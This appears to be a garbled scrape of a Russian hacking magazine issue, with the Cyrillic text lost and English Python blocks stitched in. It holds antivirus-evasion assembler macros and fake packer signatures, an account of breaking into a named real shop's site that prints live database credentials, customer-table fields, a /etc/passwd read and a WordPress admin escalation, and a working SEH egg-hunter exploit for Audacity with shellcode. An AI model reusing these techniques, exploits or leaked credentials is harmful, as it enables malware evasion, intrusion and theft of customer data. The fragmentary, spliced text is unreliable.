invoke IsBadReadPtr,RandomParam1,RandomParam2
else if variant = 1
invoke IsBadWritePtr,RandomParam1,RandomParam2
else if variant = 2
invoke IsBadCodePtr,RandomParam1
else if variant = 3
invoke GetLastError
end if
}

, API- Eax, Ecx Edx. ,
.
gen_trash. ;
, . , .
, :

:
macro GetLastError {
randomize
variant = rndnum mod 2
if variant = 0
mov eax,[fs:18h]
mov eax,[eax+TEB.LastError]
else if variant = 1
invoke GetLastError
end if
}

0XA11A5,

. FASM
, . , , mov
reg32_1, reg32_2. ? ,
( ):
push reg32_2
pop reg32_1

push reg32_2
mov reg32_1,[esp]
add esp,4

push reg32_2
xchg reg32_1,reg32_2
pop reg32_2

, ,

. ,
mov. , ,
:
macro mov arg1,arg2 {
if (arg1 eqtype eax) & (arg2 eqtype eax)
randomize
variant = rndnum mod 4
if variant = 0
push arg2
pop arg1
else if variant = 1
push arg2
mov arg1,[esp]
add esp,4
else if variant = 2
push arg2
xchg arg1,arg2
pop arg2
else if variant = 3
mov arg1,arg2
end if
else
mov arg1,arg2
end if
}

mov eax,ecx
mov ebp,esp
mov ecx,ebx

:
51   | push ecx
91   | xchg ecx, eax
59   | pop ecx
89e5 | mov ebp, esp
53   | push ebx
59   | pop ecx

, ?
, .
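To see what the FASM macros above actually emit, here is an added Python model of the same generator; it is not the article's code. It reproduces the compile-time LCG (including the page's variant of feeding the shifted value back as the seed), the int / lea / fpu encodings, the freereg rule that avoids esp, ebp and registers in use, and the four mov reg,reg substitutions from the table above. ENTRY_POINT and the seeds are this example's assumptions; the byte strings it produces can be checked against the listings on the page.

```python
"""Python model of the FASM junk-code generator above: same LCG, same
int / lea / fpu encodings, same register bookkeeping and mov substitutions."""

REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI = range(8)
ENTRY_POINT = 0x400000          # assumed; the macros take it from the 'start' label


class Lcg:
    """The page's compile-time PRNG. Unlike ANSI rand() it stores the shifted
    value back as the seed, so the sequence degrades faster; reproduced as-is."""

    def __init__(self, seed: int = 100500):
        self.seed = seed

    def randomize(self) -> int:
        self.seed = self.seed * 1103515245 + 12345
        self.seed = (self.seed // 65536) % 0x100000000
        return self.seed & 0xFFFFFFFF


def enc_int(n: int) -> bytes:                 # CD imm8
    return bytes([0xCD, n & 0xFF])


def enc_lea(reg: int, addr: int) -> bytes:    # 8D /r with modrm 00 reg 101 = disp32
    return bytes([0x8D, reg * 8 + 5]) + addr.to_bytes(4, "little")


def enc_fpu(t: int) -> bytes:                 # D8 C0+t: fadd/fmul/fcom/fcomp/fsub/fsubr st0,st(i)
    return bytes([0xD8, 0xC0 + t])


def modrm_rr(reg: int, rm: int) -> int:
    return 0xC0 | (reg << 3) | rm


def enc_mov(dst: int, src: int, variant: int):
    """The four interchangeable spellings of mov dst,src from the macro."""
    if variant == 0:                          # push src / pop dst
        return f"push {REGS[src]} / pop {REGS[dst]}", bytes([0x50 + src, 0x58 + dst])
    if variant == 1:                          # push src / mov dst,[esp] / add esp,4
        return (f"push {REGS[src]} / mov {REGS[dst]},[esp] / add esp,4",
                bytes([0x50 + src, 0x8B, (dst << 3) | 0x04, 0x24, 0x83, 0xC4, 0x04]))
    if variant == 2:                          # push src / xchg dst,src / pop src
        if dst == EAX:
            xchg = bytes([0x90 + src])        # short form when eax is involved
        elif src == EAX:
            xchg = bytes([0x90 + dst])
        else:
            xchg = bytes([0x87, modrm_rr(src, dst)])
        return (f"push {REGS[src]} / xchg {REGS[dst]},{REGS[src]} / pop {REGS[src]}",
                bytes([0x50 + src]) + xchg + bytes([0x58 + src]))
    return f"mov {REGS[dst]},{REGS[src]}", bytes([0x89, modrm_rr(src, dst)])


class Junk:
    def __init__(self, seed: int = 100500):
        self.rng = Lcg(seed)
        self.used = set()                     # USEDREG1/USEDREG2: live registers

    def free_reg(self) -> int:
        """freereg: never esp, ebp or a register the real code is using.
        Bounded so a degenerate PRNG state cannot spin forever."""
        for _ in range(64):
            r = self.rng.randomize() % 8
            if r not in (ESP, EBP) and r not in self.used:
                return r
        return next(r for r in range(8) if r not in (ESP, EBP) and r not in self.used)

    def gen_trash(self, count: int) -> list:
        """gen_trash: a list of (asm text, bytes), one junk instruction each."""
        out = []
        for _ in range(count):
            variant = self.rng.randomize() % 3
            if variant == 0:
                r = self.free_reg()
                addr = ENTRY_POINT + self.rng.randomize() % 0x1001
                out.append((f"lea {REGS[r]},[0x{addr:x}]", enc_lea(r, addr)))
            elif variant == 1:
                t = self.rng.randomize() % 0x2F
                out.append((f"fpu op D8 {0xC0 + t:02X}", enc_fpu(t)))
            else:
                n = self.rng.randomize() % 0xFF
                out.append((f"int 0x{n:02x}", enc_int(n)))
        return out


if __name__ == "__main__":
    gen = Junk(seed=100500)
    gen.used = {EAX, ECX}                     # as during the XOR decryption loop
    for text, code in gen.gen_trash(8):
        print(code.hex().ljust(14), text)
```

Two things the model makes visible that the macros hide: the whole output is a pure function of the seed (the same seed reproduces the same "random" build, which is what a scanner's unpacking heuristics exploit), and the fallback in free_reg is needed because a compile-time PRNG can reach a short cycle.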

0XAB1E,

.
.
, .
, , . : , ,
,
. ( , ),
:
macro proc_1 {
proc AnyProcedure1
...
ret
endp
}
macro proc_2 {
proc AnyProcedure2
...
ret
endp
}

flag_1 = 0
flag_2 = 0
...
entry $
;
...
while (flag_1 = 0) | (flag_2 = 0)
randomize
sequence = rndnum mod 2
if sequence = 0
if flag_1 = 0
proc_1
flag_1 = 1
end if
else if sequence = 1
if flag_2 = 0
proc_2
flag_2 = 1
end if
end if
end while

RAZ0R HTTP://RAZ0R.NAME

, ,
, , .

0XDEFACED, :

. , :
push label - value
add [esp],value
jmp [esp]
....
label:
add esp,4

, , , , . o_jmp o_label:
macro o_jmp destination {
randomize
variant = rndnum mod 2
if variant = 0
randomize
value = rndnum mod IMAGE_BASE
push destination - value
add [esp],value
jmp [esp]
else if variant = 1
randomize
value = rndnum mod (0xFFFFFFFF - IMAGE_BASE - 0x1000)
push destination + value
sub [esp],value
jmp [esp]
end if
}
macro o_label name {
label name
add esp,4
}


68001127b6     | push dword 0xb6271100
812c249b10e7b5 | sub dword [esp], 0xb5e7109b
ff2424         | jmp dword near [esp]
31c0           | xor eax, eax
83c404         | add esp, 0x4
31c0           | xor eax, eax

, , ,
. \ ,
Esp , .
, (
). ,
. :
macro facke_code_ref data_addr,jmp_addr {
xor eax,eax
inc eax
jnz jmp_addr
call data_addr
;trash
}

data_addr .

0XA55 \

FASM,
, load store.
. , xor:
macro xor_data start,length,key {
repeat length
load x from start+%-1
x = x xor key
store x at start+%-1
end repeat
}

, . :
randomize
XOR_KEY = rndnum mod 0xFF
xor_data strings, strings_size, XOR_KEY
strings:


radare
any_string db 'Mate.Feed.Kill.Repeat'
strings_size = $ - strings

0XABA51A,

,
, .
int3,
. , crc32 :
CRC32_SUM = 0
macro calc_crc32 start, size {
local b,c
c = 0xffffffff
repeat size
load b byte from start+%-1
c = c xor b
repeat 8
c = (c shr 1) xor (0xedb88320 * (c and 1))
end repeat
end repeat
CRC32_SUM = c xor 0xffffffff
}

, if(original_hash != current_hash) Error() ! , . :
mov eax,address + original_hash
sub eax,current_hash
call eax

. : , , ,
- , .

0XACCEDE,

PEiD , ,
\. ,
, , Entry
Point . ,

, , . , , , .
macro facke_sign {
randomize
variant = rndnum mod N
if variant = 0
;PE Protect 0.9 -> Christoph Gabler
push edx
push ecx
push ebp
push edi
db 0x64, 0x67, 0xA1, 0x30, 0x00
;mov eax,[fs:0x30], FASM
test eax,eax
js @f+1
call .end.sign
pop eax
add eax,7
db 0xC6
nop
ret
@@:
db 0xE9,0x00,0x00,0x00,0x00
.end.sign:
else if variant = 1
;CD-Cops II -> Link Data Security
push ebx
pushad
mov ebp,0x90909090
lea eax,[ebp-0x70]
lea ebx,[ebp-0x70]
call $+5
lea eax,[ecx]
db 0xE9,0x00,0x00,0x00,0x00
...
else if variant = N
...
end if
}

0XAD105.


. : ,
, . ,
, ,
.
:
FASM, trial- ;
,
. (,
crack' ..)
. , , ,
, . , ,
, . , open your
eyes, open your mind! z



icq 884888, http://snipper.ru

!
-

! .
growshop azarius.net
.
About Azarius, ,
-
( 1999 ) .
,
:).

, , , ,
, mod_
rewrite, http://azarius.net/smartshop/
psychedelics/. ,
, WordPress (http://azarius.net/
blog/), phpBB 2.0.22 (http://azarius.net/forum/
docs/CHANGELOG.html) - Piwik 0.5.5
(http://piwik.azarius.net).
Piwik
XSS ( advisory ). XSS , ,

.

.
,
, .svn-
. .
-, SVN ,

.


-, SVN
, .svn.
entries
, , .svn.
, , ,
.
, :
SVN, ,
site.com/.svn/entries,
.
azarius.net/.svn/entries,

2008-11-18T10:25:57.000000Z
c581920ba2dad34f3e6841ac061d958c
2007-11-16T11:06:53.860515Z
935
alex
category.php
file
2008-11-18T10:25:57.000000Z
7ce2e23ac9bc560edc2e79073fb630db

HTTP://WWW

links

2007-01-04T16:03:07.477725Z
138
alex
find.php
file
2009-05-01T12:58:14.000000Z
beea2f728667240c14795d3c508a5144
2009-05-01T09:08:40.782967Z
1307
alex
recent.php
file

, PHP-
.svn/text-base/, .
,
azarius.net
,
, - .
- ,
, .
,
:).
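An .svn/entries file of formats 8 to 10 (Subversion 1.4 to 1.6) is a sequence of records terminated by a form feed, each record a newline-separated field list: name, kind, revision, url, repos, schedule, text-time, checksum, committed date, committed revision, author (trailing empty fields are omitted). The excerpt above is exactly the tail of such records. As an added example, not part of the article, the following Python parses a constructed entries blob built from the names, checksums and dates quoted above, derives the pristine-copy URLs under .svn/text-base/, and verifies a fetched copy against the MD5 checksum the record carries. The repository URL in the sample is invented.

```python
"""Parse a Subversion 1.4-1.6 working-copy .svn/entries file (the format that
leaked here) and derive the pristine copies under .svn/text-base/."""
import hashlib
from dataclasses import dataclass
from typing import List


@dataclass
class Entry:
    name: str
    kind: str            # "file" or "dir"
    text_time: str
    checksum: str        # MD5 of the pristine (text-base) copy
    committed_date: str
    committed_rev: str
    author: str


# Field positions inside one record (formats 8, 9 and 10). svn omits trailing
# empty fields, so a record can be shorter than this; the parser pads it.
F_NAME, F_KIND, F_TEXT_TIME, F_CHECKSUM, F_CMT_DATE, F_CMT_REV, F_AUTHOR = 0, 1, 6, 7, 8, 9, 10


def parse_entries(blob: str) -> List[Entry]:
    first_nl = blob.index("\n")
    fmt = int(blob[:first_nl])
    if fmt < 8:
        raise ValueError(f"entries format {fmt}: pre-1.4 layout, not handled here")
    entries = []
    for record in blob[first_nl + 1:].split("\x0c\n"):   # form feed terminates a record
        if not record.strip():
            continue
        f = record.split("\n")
        f += [""] * (11 - len(f))
        entries.append(Entry(f[F_NAME], f[F_KIND], f[F_TEXT_TIME], f[F_CHECKSUM],
                             f[F_CMT_DATE], f[F_CMT_REV], f[F_AUTHOR]))
    return entries


def text_base_urls(site: str, entries: List[Entry]) -> List[str]:
    """URL of the pristine copy for every versioned file in this directory."""
    return [f"{site.rstrip('/')}/.svn/text-base/{e.name}.svn-base"
            for e in entries if e.kind == "file"]


def checksum_matches(entry: Entry, pristine: bytes) -> bool:
    """The checksum field is the MD5 of the text-base copy, so a fetched
    .svn-base file can be verified as complete and unmodified."""
    return hashlib.md5(pristine).hexdigest() == entry.checksum


# Constructed entries blob using the names, checksums and dates quoted above;
# the repository URL is invented.
SAMPLE_ENTRIES = (
    "10\n"
    "\ndir\n1307\nhttp://svn.example.invalid/www/trunk\nhttp://svn.example.invalid\n\n\n\n"
    "2009-05-01T09:08:40.782967Z\n1307\nalex\n\x0c\n"
    "category.php\nfile\n\n\n\n\n2008-11-18T10:25:57.000000Z\nc581920ba2dad34f3e6841ac061d958c\n"
    "2007-11-16T11:06:53.860515Z\n935\nalex\n\x0c\n"
    "recent.php\nfile\n\n\n\n\n2009-05-01T12:58:14.000000Z\nbeea2f728667240c14795d3c508a5144\n"
    "2009-05-01T09:08:40.782967Z\n1307\nalex\n\x0c\n"
    "images\ndir\n\x0c\n"
)

if __name__ == "__main__":
    for url in text_base_urls("https://azarius.net/", parse_entries(SAMPLE_ENTRIES)):
        print(url)
```

The same parser run recursively over every "dir" entry enumerates the whole exposed tree; the checksum comparison is what tells you a .svn-base download was served whole rather than truncated by the web server.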

phpBB azarius.net/forum/.svn/
text-base/common.php.svn-base:
<?php
$dbms = 'mysql4';
$dbhost = 'database.azarius.net';
$dbname = 'azaforum';
$dbuser = 'web_azarius';
$dbpasswd = 'azariuskaki734';
$table_prefix = 'phpbb_';
define('PHPBB_INSTALLED', true);
?>

, -
database.azarius.net
.
80 HTTP- :
[an error occurred while processing this
directive]
You don't have permission to access the
requested directory.

There is either no index document or the


directory is read-protected.
[an error occurred while processing this
directive]

Phpmyadmin' , 3306
.

( :) MySQL RST/
GHC Manager,
phpBB.
, ( ,
-
!).
, .
, :
information_schema, Affiliate, aff, azabase
azaforum, cms_system, cmsbase, enquete,
payments, syslog, syslogaza, test, wordpress

payments log,
,
azabase.
: 239545 , 291187 .
:
UserID, UserStatusID, FirstName,
LastName, Email, EmailVerified, Company,
CompanyDescription, KVKNumber,
BTWNumber, InvoiceAllowed, Remark,
Password, ForumID, ForumAdmin,
LastLogin, LangID, CurrencyID,
_Buyer_Address, _Buyer_Host, _Buyer_Agent,
_Klantcode, _Tussenvoegsel, _Korting,
_PasswordNew, _EmailSend, _session_id,
_Website, modified, Newsletter, Nickname


, ,
-
:).

piwik.org/
blog/2010/04/piwik-06-security-advisory/
Piwik <= 0.5.5
Login Form XSS
habrahabr.ru/blogs/
infosecurity/70330/
.svn
https://forum.
antichat.ru/threadnav51383-1-10.html
MySQL RST/GHC
Manager 2.3
snipper.ru/view/5/
magic-include-shell/
Magic Include Shell
3.3.3

INFO


MySQL
.

mysql.user,


Host (

%,
localhost).

WARNING



.


.
,



,

.


azarius.net
cat ./*|grep
ServerName:

SELECT load_file('/etc/passwd')

, SVN
.
, , , ,
,
WordPress :).
, http://www.azarius.net/blog/wp-login.
php?action=register , wordpress.
,
wp_usermeta wp_capabilities.
, , , :
a:1:{s:10:"subscriber";b:1;}

, ,
:
a:1:{s:13:"administrator";b:1;}

, http://azarius.net/
blog/wp-admin .
,
Hello dolly .
http://azarius.net/
blog/?azarius :).

:
1. ;
2. ;
3. -.
, PHP-
/var/www/html/azarius/public/, , ,
.
, ,
.
locate httpd.conf /
etc/apache2/sharedconfig/sites-enabled/,
.


affiliate.herbaldistribution.com
blog.azarius.net
conscious.nl
consciousdreams.nl
database.azarius.net
dropshipping.consciouswholesale.com
middleware.entheogenics.com
pimpyourbicycle.com
piwik.azarius.net
redir.vaposhop.com
secure.azarius.net
stats.azarius.net
webman.azarius.net
webman.vaposhop.com
www.azarius.at
www.azarius.be
www.azarius.es
www.azarius.fr
www.azarius.net
www.azarius.nl
redir.azarius.nl
www.azarius.pt
consciouswholesale.com
www.crazy-t-shirts.com
www.cultofarcha.com
www.entheogenics.com
greenlabelseeds.com
www.mushxl.nl
www.shavita.net
www.shroomshaker.net
smartshop.nl
www.travellersgarden.com
vaposhop.com
www.xtenzion.nl

, azarius.net ,
:). , ,
.
,
,
, , (,
, :).

-
,
.

, , , . , , ! z

egg hunt

][

Windows.
, - .
: /.
Egg Hunting.
EGG HUNTING?


, . , .
, Egg Hunting ,
/. .

skape 2003 (hick.org/code/skape/papers/egghuntshellcode.pdf).

, ,
/ ,
. , .
, ...
, ,
PoC-.
, , TCP-.
,
, -


, , .
, , ,
, ,
,
, , , .
, staged-,
, . - ,
staged-. ,
200 (
27 :)), 341 .
\x00\xff, ,
227 368 .
, -: 534, 816.
, .
c . ,
DNS, Easy Hack,
1000 , .
?
? -. .

, ,
EIP. , MSF


SEH

Payload information. , ms08_067_netapi 400 ,
trendmicro_serverprotect 800 , ActiveX , . ,
, . ?
, .
- . ?
. , IE 6/7, -,
, imap- Mercur
Messaging imap-.

, ... ,
Windows ASLR, SafeSEH,
DEP, GS .. ? ,
, , . , , . ,
:).
jit-spay IE8, FF3.6 DEP, ASLR
(exploit-db.com/exploits/13649/), .
jit-
, .
- .

- ?
-, - ,
.
,
. tag egg, egg hunting.
,
. , ,
. ,
, , :).
,
().
,
access violation, .
-, ,
. ( )
Windows. :
, ,
.
.

NTDISPLAYSTRING / NTACCESSCHECKANDAUDITALARM

( :)) . (system call) NtDisplayString


. :
NTSYSAPI NTSTATUS NTAPI NtDisplayString(
IN PUNICODE_STRING String
);

, : EAX ,
, .
, , EDX. EAX
0xc0000005, Access Violation. scads,
(egg) EAX EDI.
:
00000000  6681CAFF0F  or dx,0xfff
00000005  42          inc edx
00000006  52          push edx
00000007  6A43        push byte +0x43
00000009  58          pop eax
0000000A  CD2E        int 0x2e
0000000C  3C05        cmp al,0x5
0000000E  5A          pop edx
0000000F  74EF        jz 0x0
00000011  B877303074  mov eax,0x74303077   ; immediate = tag bytes "w00t"
00000016  8BFA        mov edi,edx
00000018  AF          scasd
00000019  75EA        jnz 0x5
0000001B  AF          scasd
0000001C  75E7        jnz 0x5
0000001E  FFE7        jmp edi

, EDX
. 1000h x86,
, , , .
, EDX FFF,
, 1000h.
, , EDX 1h(.
00000019, 0000001C), ,
1000h (. 0000000F).
EDX , , .
EAX 0x43h. , NtDisplayString. int 2e
. , ,
EAX. 0x5



( , access violation)
. , ,
EDX .
. the tag bytes 77 30 30 74 ("w00t", read by the CPU as the dword 0x74303077), . EAX, EDI
EDX. SCASD EAX c ,
EDI.
, EDX ,
.
SCASD ,
. SCASD
EDI , , jmp edi.
-
? , skape
NtDisplayString
NtAccessCheckAndAuditAlarm.
.
NtDisplayString:
00000007 6A43

push byte +0x43

NtAccessCheckAndAuditAlarm:
00000007 6A02

push byte +0x2

NtAccessCheckAndAuditAlarm . (0x43h),
NtDisplayString
.

ISBADREADPTR

API- .
:
BOOL IsBadReadPtr(
const VOID* lp,
UINT_PTR ucb
);

,
.
,
.


Egghunter

00000000  33DB        xor ebx,ebx
00000002  6681CBFF0F  or bx,0xfff
00000007  43          inc ebx
00000008  6A08        push byte +0x8
0000000A  53          push ebx
0000000B  B80D5BE777  mov eax,0x77e75b0d   ; IsBadReadPtr
00000010  FFD0        call eax
00000012  85C0        test eax,eax
00000014  75EC        jnz 0x2
00000016  B877303074  mov eax,0x74303077   ; immediate = tag bytes "w00t"
0000001B  8BFB        mov edi,ebx
0000001D  AF          scasd
0000001E  75E7        jnz 0x7
00000020  AF          scasd
00000021  75E4        jnz 0x7
00000023  FFE7        jmp edi

EBX
. , 0x8h ucb-, EBX
. EAX IsBadReadPtr . ,
, -, ,
. EAX ,
. .
SEH,
,
(60 ), , , XP SP2 SEH',
.

() ,
( )
, , , .
SCASD, ,
(D) , ,
.
CDL.

:
access violation 41414141.
: EIP , . ESI, ECX.
(. ). SEH (View - SEH
chain).
, . . , ,
pvefindaddr.
:
!pvefindaddr pattern_create 2000


,
. ,
,
, 100%
.
, Linux- ,
Windows, , , .
skape.

. .

,
.
, , , .
Audacity.
1.2.6. offensive-security.com/
archive/audacity-win-1.2.6.exe, .
, ,
.
Immunity
Debugger c pvefindaddr corelanc0d3r' (
). immunityinc.com/productsimmdbg.shtml, corelan.be:8800/index.php/security/
pvefindaddr-py-immunity-debugger-pycommand/ .
, pvefindaddr , .
PyCommands.
Perl, Win
ActivePerl activestate.com/activeperl.
, . MIDI- . AAAAA
2000 .
#!/usr/bin/perl
$junk = "\x41" x 2000 ;
# 2
$sploit = $junk;
#
open(FILE, ">test.gro") or die "Cannot open file: $!";
#
print FILE $sploit;
#
close(FILE); #
print "test.gro has been created \n";

Audacity (F9).
(- MIDI).

, (l)
mspattern.txt Immunity Debugger,
$junk. test.gro
(ctrl+F2).
, suggest,
8 , ,
(, SEH ..),
.
!pvefindaddr suggest

.
, SEH
67413966, :
!pvefindaddr pattern_offset 67413966

SEH, . SEH-
4- .
(nextSEH),
, ,
. . , , -
pop, pop, ret,
, ,
. nextSEH
, , , \xeb\x06\x90\x90. 6 (2 \x90
(NOP) 4 SEH), ,
.
, ,
:).
, SEH 178 , next SEH 174. .
, pop pop
ret, .
. . p safeSEH, p1
safeSEH ASLR, 2 . .
!pvefindaddr p

, , ,
, . -.


pvefindaddr

$junk = "\x41" x 174;                 # padding up to the nextSEH field
$jumpNextSEH = "\xeb\x06\x90\x90";    # short jmp +6 over the SEH record
$SEH = pack("V", 0x013e5423);         # address of a pop/pop/ret sequence
$shell = "\x42" x 200;                # shellcode placeholder: 200 'B's
$sploit = $junk.$jumpNextSEH.$SEH.$shell;

, . SEH-:
1. View SEH chain;
2. Follow hadler.

pop, pop, ret. , pop'


F2 ( SEH chain). Shift+F9, .
pop. (F7) ret NextSEH, 6 .
B.
, ,
200 . 72 . .
, . , ,
... .
-
.
,
:
#!/usr/bin/perl
$shell="\xeb\x03..\x5a"; # -
open(FILE, ">shell") or die "Cannot open file: $!";
print FILE $shell;
close(FILE);
!pvefindaddr compare c:\egg\shell

, , -.
, .
.
, 73 , .
,
, - . - 72 ,
, . :


, SEH-

# the egg (tag)
$tag = "\x77\x30\x30\x74";
# NtAccessCheckAndAuditAlarm egg hunter, 32 bytes
$egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" . $tag . "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
# NOP padding
$junk2 = "\x90" x 50;
# final buffer: the doubled tag marks the start of the real shellcode
$sploit = $junk.$jumpNextSEH.$SEH.$egghunter.$junk2.$tag.$tag.$shell;
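The listing earlier and the Perl fragment that builds $egghunter are two views of the same 32 bytes. As an added example (not the article's code) the Python below assembles the NtAccessCheckAndAuditAlarm variant from the opcode bytes on the page with the tag dropped in as the mov eax immediate, then emulates its search loop over a small constructed address space: unreadable pages are skipped whole (or dx,0xfff / inc edx), readable ones are walked byte by byte, and only the doubled tag counts. The fake memory layout and the reduction of the syscall to "readable or not" are this example's simplifications.

```python
"""Egg hunter: assemble the 32-byte NtAccessCheckAndAuditAlarm hunter and
emulate its search over a small fake address space."""

PAGE = 0x1000
TAG = b"w00t"   # the egg; the payload is preceded by it twice

# Opcode bytes from the listing: everything before the tag immediate of
# "mov eax, <tag>" (ending in B8) and everything after it.
HUNTER_HEAD = bytes.fromhex("6681CAFF0F42526A0258CD2E3C055A74EFB8")
HUNTER_TAIL = bytes.fromhex("8BFAAF75EAAF75E7FFE7")


def build_hunter(tag: bytes = TAG) -> bytes:
    """Return the hunter with the 4-byte tag embedded as the mov eax immediate."""
    if len(tag) != 4:
        raise ValueError("tag must be exactly 4 bytes")
    return HUNTER_HEAD + tag + HUNTER_TAIL


class FakeMemory:
    """Flat address space with some pages unmapped (constructed, not real memory)."""

    def __init__(self, size: int, unmapped_pages):
        self.mem = bytearray(size)
        self.unmapped = set(unmapped_pages)

    def readable(self, addr: int, n: int = 8) -> bool:
        # the syscall probes the 8-byte structure at [edx]; any unmapped byte faults
        if addr + n > len(self.mem):
            return False
        return all(((addr + i) >> 12) not in self.unmapped for i in range(n))

    def dword(self, addr: int) -> bytes:
        return bytes(self.mem[addr:addr + 4])

    def write(self, addr: int, data: bytes) -> None:
        self.mem[addr:addr + len(data)] = data


def hunt(memory: FakeMemory, tag: bytes = TAG, start: int = 0):
    """Emulate the hunter loop. Returns the address jmp edi lands on (first
    byte after the doubled tag) or None once the address space is exhausted.
    Like the real code it starts on the page after 'start'."""
    size = len(memory.mem)
    edx = start
    while True:
        edx = (edx | 0xFFF) + 1             # or dx,0xfff / inc edx: next page
        if edx >= size:
            return None
        while edx < size:
            if not memory.readable(edx):    # syscall returned STATUS_ACCESS_VIOLATION
                break                       # jz 0: back to the page skip
            edi = edx
            if memory.dword(edi) == tag and memory.dword(edi + 4) == tag:
                return edi + 8              # both scasd matched: jmp edi
            edx += 1                        # jnz 5: inc edx, try the next byte


if __name__ == "__main__":
    mem = FakeMemory(4 * PAGE, unmapped_pages={1})
    mem.write(2 * PAGE + 0x40, TAG + b"XXXX")              # lone egg, must be skipped
    mem.write(2 * PAGE + 0x123, TAG + TAG + b"\xcc" * 16)  # doubled egg, then payload
    print(build_hunter().hex(), hex(hunt(mem)))
```

The emulation makes the two practical caveats visible: the hunter never looks at the page it starts on, and it walks every readable byte, so on a process with a large committed heap the search takes noticeably long before the doubled tag is reached.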

$junk2 , 73
, ,
() , . -, .
SEH, .
,
,
. , EDX(\x33\xD2)
. ,
.
. :
corelanc0d3r': corelan.be:8800/index.php/2010/01/09/exploitwriting-tutorial-part-8-win32-egg-hunting/.
MSF: offensive-security.com/metasploitunleashed/ - : r00tin.
blogspot.com/2009/03/heap-only-egg-hunter.html

. . , .
, , ,
. , , ,
,
. , Mercur Messaging 2005 IMAP-.

SUBSCRIBE(CVE-ID: 2007-1579). 224 payload. ,
LIST , 2 . McAfee
ePolicy Orchestrator 3.5.0. 140 , .
- , , .
:). z

!

1.

8.5

DVD

!
3 !
? ?
.
.
( )




.

540 .



72 000 QIWI ()
.

?
8(495)780-88-29 ( ) 8(800)2003-999 ( ,
, ).
,
info@glc.ru

, ,

shop.glc.ru.
2. .
3.
:
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,
. , . 11, . 44,
, .
!
c

,
.
, ,

:
2200 . 12 , 1260 . 6

. ,

, R-kiosk
. .27-31:
540.00 . 6 !

, , , .


icq 884888

X-TOOLS

: ATC File Wiper
:Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: AlexTheC0d3r

E:\ATCfilewiper.exe "e:\downloads\
papka_dlya_ydaleniya"

(
);

;


.
extraClean:
D:\vasya\*.exe
C:\documents and settings\Admin\My
Documents\*.*
C:\MyProgs\*.pas
C:\nokia\jimm.*

,
- .
,
.

, .

.
, ATC File Wiper
AlexTheC0d3r'
: GUI .
:
(
);
,
, <;
(
);
Windows;
GUI
:
e:\Program Files\ATC\wipergui.exe
"D:\papka_dlya_ydaleniya" 15);



, .
,
, (
).
, ,

https://forum.antichat.ru/
showpost.php?p=1898379.

: WebDirScanner
: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: 0x00

;

-;

oks.txt log.txt (^ ": ");

;
.Net Framework 2.0 .

,
:
dmin1.php
admin1.html
admin2.php
admin2.html
yonetim.php
yonetim.html
yonetici.php
yonetici.html
adm/
admin/
admin/account.php
admin/account.html
admin/index.php
admin/index.html
admin/login.php
admin/login.html
admin/home.php
admin/controlpanel.html
admin/controlpanel.php
admin.php
admin.html
admin/cp.php
admin/cp.html
cp.php


webxakep.net/
forum/showthread.php?t=5201.

- .
WebDirScanner
webxakep.net, 0x00.
,

.
:

dir.txt;

: ArxGrabberSite
: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: ArxWolf

,


ArxGrabberSite.
,
.




,
, PHP:
Email: [_a-zA-Z\d\-\.]+@[_a-zA-Z\d\-]+(\.[_a-zA-Z\d\-]+)+
URL: (?i)href=("|#39|)(http://|https://|ftp://|www.|UPD://)([_a-z\d\-]+(\.[_a-z\d\-]+)+)((/[ _a-z\d\-\\\.?=&%://]+)+)*
JS: <script([^>]*?)>(.*?)</script>

:
email-;
;
JavaScript;
;
;
;
.

ArxWolf' webxakep.net/forum/
showthread.php?t=4850.

: SGalaxy v 0.7
: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: RINGER




(javagala.ru).

:
;
;
;
;
;
;
;
email.

,

.

:
0
;
1-5
1-5 ;

911 ;
922 ;
999 ;
933 ;
111 ;
1000 ;
222 email;
40
;
50 .

, :)

: VK VoTeR
: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: mailbrush


VK VoTeR

mailbrush.
,
,

.
.
:
1. ;
2. ;
3.
(, :)

":"

.

, ,
.
.
:
;
[OPTION]
;
, .
, #8 ,
,

:

[OPTION] the best!|


[OPTION]|[OPTION] !

,
"|",
:
the best!

!

, . ,
https://forum.antichat.
ru/thread194387.html.

: slil.ru File Uploader


:Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: slesh


,
slil.ru.
:
1. ;
2. :
2000, XP, 2003 C:\Documents and
Settings\< >\SendTo\
Vista, 7 C:\Users\< >\AppData\Roaming\Microsoft\
Windows\SendTo\

,
.
slil.ru.
:
;
;
;
(WinAPI + WinSock);
7680 .

. z


MALWARE
RankoR ax-soft.ru

VirusTotal



, VirusTotal',
.
? ,
,
.

, ? .
. VDS,
Dedicated. Core
Duo, 2 RAM (10
/) $100 .
:).


Linux
,
( )
.
Ubuntu Server 10.04.
C++/Qt.
,

, Qt ,
.
PHP + AJAX. ?
/, ,
.
.

PHP-

.
? ,
stdout.
, --help, , (, )
.
?
(
][ ), Qt QProcess,
.
, . , . ?

. :
class QAvProcess : public QProcess {
Q_OBJECT
public:
void inline startProcess(const QString &name, const QStringList &params);
......
signals:
void onAvFinished(QAvProcess *sender, const QString &av, const QString &output, const int exitCode);
private slots:
void onFinished(int exitCode, QProcess::ExitStatus exitStatus);
void onReadyRead();
};

, QProcess.
:
void QAvProcess::startProcess(
const QString &name,
const QStringList &params)
{
QFileInfo info(name);
avName = info.fileName();
start(name, params);
}

, . ,
onReadyRead, , onFinished()
emit onAvFinished(this, avName,
avBuffer, exitCode). , , :

WARNING

INFO
RESPECT
-3-1
(
)
.
DieHard, YaesU, metal
Asechka.Ru community

class QAv : public QObject{
Q_OBJECT
public:
void startCheck(const QString &fName);
private:
QMap<QString, QString > avs;
QList<QResultPair > results;
QString fileName;
inline QAvProcess* createProcess();
QVirInfo inline parseOutput(
const QString &avName,
const QString &output);
signals:
void onAVDone(const QString avName,
const QString avResult);
private slots:
void onAvFinished(QAvProcess *sender,
const QString &av,
const QString &output,
const int exitCode);
};



MALWARE

onAvFinished()
QString avName = avs.find(av).value();
if ( avName.isEmpty() ){
